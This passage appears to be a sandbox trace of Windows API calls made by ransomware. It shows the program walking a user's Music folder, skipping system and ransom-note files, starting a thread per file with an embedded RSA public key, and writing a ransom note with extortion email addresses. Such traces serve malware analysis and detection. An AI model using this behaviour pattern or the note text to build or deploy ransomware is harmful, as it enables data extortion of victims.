LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0052.163] lstrcpyW (in: lpString1=0x17be7c, lpString2="aF_IB.m4a" | out: lpString1="aF_IB.m4a") returned="aF_IB.m4a" [0052.163] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" [0052.163] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x5f8 [0052.163] Sleep (dwMilliseconds=0x96) [0052.318] FindNextFileW (in: hFindFile=0x3e28638, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0052.318] lstrcmpW (lpString1="jEamZMQ.mp3", lpString2="..") returned 1 [0052.318] lstrcmpW (lpString1="jEamZMQ.mp3", lpString2=".") returned 1 [0052.318] StrStrW (lpFirst="jEamZMQ.mp3", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0052.318] StrStrW (lpFirst="jEamZMQ.mp3", lpSrch="ntldr") returned 0x0 [0052.318] StrStrW (lpFirst="jEamZMQ.mp3", lpSrch="NTLDR") returned 0x0 [0052.318] StrStrW (lpFirst="jEamZMQ.mp3", lpSrch="NTDETECT.COM") returned 0x0 [0052.318] StrStrW (lpFirst="jEamZMQ.mp3", lpSrch="ntdetect.com") returned 0x0 [0052.318] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\", lpSrch="Desktop") returned 0x0 [0052.318] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\", lpSrch="DESKTOP") returned 0x0 [0052.319] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\") returned 59 [0052.319] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0052.319] lstrcpyW (in: lpString1=0x17be7c, lpString2="jEamZMQ.mp3" | out: lpString1="jEamZMQ.mp3") returned="jEamZMQ.mp3" [0052.319] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" [0052.319] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x62c [0052.319] Sleep (dwMilliseconds=0x96) [0052.474] FindNextFileW (in: hFindFile=0x3e28638, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0052.474] lstrcmpW (lpString1="JO1Lf.m4a", lpString2="..") returned 1 [0052.474] lstrcmpW (lpString1="JO1Lf.m4a", lpString2=".") returned 1 [0052.474] StrStrW (lpFirst="JO1Lf.m4a", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0052.474] StrStrW (lpFirst="JO1Lf.m4a", lpSrch="ntldr") returned 0x0 [0052.474] StrStrW (lpFirst="JO1Lf.m4a", lpSrch="NTLDR") returned 0x0 [0052.474] StrStrW (lpFirst="JO1Lf.m4a", lpSrch="NTDETECT.COM") returned 0x0 [0052.474] StrStrW (lpFirst="JO1Lf.m4a", lpSrch="ntdetect.com") returned 0x0 [0052.474] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\", lpSrch="Desktop") returned 0x0 [0052.474] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\", lpSrch="DESKTOP") returned 0x0 [0052.474] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\") returned 59 [0052.475] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0052.475] lstrcpyW (in: lpString1=0x17be7c, lpString2="JO1Lf.m4a" | out: lpString1="JO1Lf.m4a") returned="JO1Lf.m4a" [0052.475] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" [0052.475] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x5f4 [0052.475] Sleep (dwMilliseconds=0x96) [0052.630] FindNextFileW (in: hFindFile=0x3e28638, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0052.630] lstrcmpW (lpString1="oKJQx_NM6hXc.mp3", lpString2="..") returned 1 [0052.630] lstrcmpW (lpString1="oKJQx_NM6hXc.mp3", lpString2=".") returned 1 [0052.630] StrStrW (lpFirst="oKJQx_NM6hXc.mp3", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0052.630] StrStrW (lpFirst="oKJQx_NM6hXc.mp3", lpSrch="ntldr") returned 0x0 [0052.630] StrStrW (lpFirst="oKJQx_NM6hXc.mp3", lpSrch="NTLDR") returned 0x0 [0052.630] StrStrW (lpFirst="oKJQx_NM6hXc.mp3", lpSrch="NTDETECT.COM") returned 0x0 [0052.630] StrStrW (lpFirst="oKJQx_NM6hXc.mp3", lpSrch="ntdetect.com") returned 0x0 [0052.630] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\", lpSrch="Desktop") returned 0x0 [0052.630] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\", lpSrch="DESKTOP") returned 0x0 [0052.630] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\") returned 59 [0052.630] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0052.630] lstrcpyW (in: lpString1=0x17be7c, lpString2="oKJQx_NM6hXc.mp3" | out: lpString1="oKJQx_NM6hXc.mp3") returned="oKJQx_NM6hXc.mp3" [0052.630] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" [0052.630] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x610 [0052.631] Sleep (dwMilliseconds=0x96) [0052.786] FindNextFileW (in: hFindFile=0x3e28638, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0052.786] lstrcmpW (lpString1="TWlZw1pNzI1gwZW3OH.mp3", lpString2="..") returned 1 [0052.786] lstrcmpW (lpString1="TWlZw1pNzI1gwZW3OH.mp3", lpString2=".") returned 1 [0052.786] StrStrW (lpFirst="TWlZw1pNzI1gwZW3OH.mp3", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0052.786] StrStrW (lpFirst="TWlZw1pNzI1gwZW3OH.mp3", lpSrch="ntldr") returned 0x0 [0052.786] StrStrW (lpFirst="TWlZw1pNzI1gwZW3OH.mp3", lpSrch="NTLDR") returned 0x0 [0052.786] StrStrW (lpFirst="TWlZw1pNzI1gwZW3OH.mp3", lpSrch="NTDETECT.COM") returned 0x0 [0052.786] StrStrW (lpFirst="TWlZw1pNzI1gwZW3OH.mp3", lpSrch="ntdetect.com") returned 0x0 [0052.786] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\", lpSrch="Desktop") returned 0x0 [0052.787] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\", lpSrch="DESKTOP") returned 0x0 [0052.787] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\") returned 59 [0052.787] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0052.787] lstrcpyW (in: lpString1=0x17be7c, lpString2="TWlZw1pNzI1gwZW3OH.mp3" | out: lpString1="TWlZw1pNzI1gwZW3OH.mp3") returned="TWlZw1pNzI1gwZW3OH.mp3" [0052.787] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" [0052.787] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x620 [0052.787] Sleep (dwMilliseconds=0x96) [0052.942] FindNextFileW (in: hFindFile=0x3e28638, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0052.942] lstrcmpW (lpString1="UazSw8R1r.wav", lpString2="..") returned 1 [0052.942] lstrcmpW (lpString1="UazSw8R1r.wav", lpString2=".") returned 1 [0052.942] StrStrW (lpFirst="UazSw8R1r.wav", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0052.943] StrStrW (lpFirst="UazSw8R1r.wav", lpSrch="ntldr") returned 0x0 [0052.943] StrStrW (lpFirst="UazSw8R1r.wav", lpSrch="NTLDR") returned 0x0 [0052.943] StrStrW (lpFirst="UazSw8R1r.wav", lpSrch="NTDETECT.COM") returned 0x0 [0052.943] StrStrW (lpFirst="UazSw8R1r.wav", lpSrch="ntdetect.com") returned 0x0 [0052.943] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\", lpSrch="Desktop") returned 0x0 [0052.943] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\", lpSrch="DESKTOP") returned 0x0 [0052.943] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\") returned 59 [0052.943] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0052.943] lstrcpyW (in: lpString1=0x17be7c, lpString2="UazSw8R1r.wav" | out: lpString1="UazSw8R1r.wav") returned="UazSw8R1r.wav" [0052.943] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" [0052.943] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x604 [0052.943] Sleep (dwMilliseconds=0x96) [0053.098] FindNextFileW (in: hFindFile=0x3e28638, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0053.098] lstrcmpW (lpString1="X7t8w3.m4a", lpString2="..") returned 1 [0053.098] lstrcmpW (lpString1="X7t8w3.m4a", lpString2=".") returned 1 [0053.098] StrStrW (lpFirst="X7t8w3.m4a", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0053.098] StrStrW (lpFirst="X7t8w3.m4a", lpSrch="ntldr") returned 0x0 [0053.098] StrStrW (lpFirst="X7t8w3.m4a", lpSrch="NTLDR") returned 0x0 [0053.098] StrStrW (lpFirst="X7t8w3.m4a", lpSrch="NTDETECT.COM") returned 0x0 [0053.098] StrStrW (lpFirst="X7t8w3.m4a", lpSrch="ntdetect.com") returned 0x0 [0053.098] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\", lpSrch="Desktop") returned 0x0 [0053.098] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\", lpSrch="DESKTOP") returned 0x0 [0053.098] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\") returned 59 [0053.099] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0053.099] lstrcpyW (in: lpString1=0x17be7c, lpString2="X7t8w3.m4a" | out: lpString1="X7t8w3.m4a") returned="X7t8w3.m4a" [0053.099] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" [0053.099] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x624 [0053.099] Sleep (dwMilliseconds=0x96) [0053.254] FindNextFileW (in: hFindFile=0x3e28638, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0 [0053.254] FindClose (in: hFindFile=0x3e28638 | out: hFindFile=0x3e28638) returned 1 [0053.255] FindClose (in: hFindFile=0x3e28638 | out: hFindFile=0x3e28638) returned 0 [0053.255] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze" [0053.255] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\*.*" [0053.255] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\", lpSrch="Desktop") returned 0x0 [0053.255] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\", lpSrch="DESKTOP") returned 0x0 [0053.255] SetErrorMode (uMode=0x1) returned 0x1 [0053.255] wsprintfW (in: param_1=0x17b43c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\_HELP_INSTRUCTION.TXT") returned 76 [0053.255] GetUserNameW (in: lpBuffer=0x179218, pcbBuffer=0x179004 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x179004) returned 1 [0053.255] wsprintfW (in: param_1=0x179010, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0053.255] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17900c | out: phkResult=0x17900c*=0x618) returned 0x0 [0053.256] RegQueryValueExW (in: hKey=0x618, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x3de49b8, lpcbData=0x179008*=0x104 | out: lpType=0x0, lpData=0x3de49b8*=0x65, lpcbData=0x179008*=0x4a) returned 0x0 [0053.256] RegCloseKey (hKey=0x618) returned 0x0 [0053.256] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17a43c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0053.256] wsprintfW (in: param_1=0x17943c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0053.256] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\auosv3m 9vtnbjukze\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0053.256] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\auosv3m 9vtnbjukze\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x618 [0053.256] WriteFile (in: hFile=0x618, lpBuffer=0x17943c*, nNumberOfBytesToWrite=0x2c4, lpNumberOfBytesWritten=0x179434, lpOverlapped=0x0 | out: lpBuffer=0x17943c*, lpNumberOfBytesWritten=0x179434*=0x2c4, lpOverlapped=0x0) returned 1 [0053.257] CloseHandle (hObject=0x618) returned 1 [0053.257] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0x3e28638 [0053.257] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze") returned="auOsV3M 9VtNbJuKze" 